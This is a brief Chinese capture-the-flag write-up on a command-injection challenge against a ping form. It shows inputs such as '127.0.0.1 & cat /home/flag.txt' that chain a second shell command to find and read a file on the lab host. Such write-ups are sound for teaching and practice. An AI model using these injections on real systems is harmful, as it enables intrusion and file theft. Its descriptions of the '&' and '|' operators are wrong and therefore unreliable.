command_execution
題目描述:小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的,你知道爲什麼嗎。
ping 是DOS命令,一般用於檢測網絡通與不通;是用來探測本機與網絡中另一主機之間是否可達的命令,如果兩臺主機之間ping不通,則表明這兩臺主機不能建立起連接。ping是定位網絡通不通的一個重要手段。
WAF:Web應用防護系統(也稱爲:網站應用級入侵防禦系統。英文:Web Application Firewall,簡稱: WAF)。利用國際上公認的一種說法:Web應用防火牆是通過執行一系列針對HTTP/HTTPS的安全策略來專門爲Web應用提供保護的一款產品。
題目是 《命令執行》 我查了點指令執行的知識
command1 & command2 :先執行command2後執行command1
command1 && command2 :先執行command1後執行command2
command1 | command2 :只執行command2
command1 || command2 :command1執行失敗,再執行command2(若command1執行成功,就不再執行command2)
顯然😂 FLAG在flag.txt中,我們查找一下flag.txt在什麼地方。我們來ping一下。
127.0.0.1 & find / -name flag.txt
可以看到在/home/flag.txt
我們cat一下
127.0.0.1 & cat /home/flag.txt
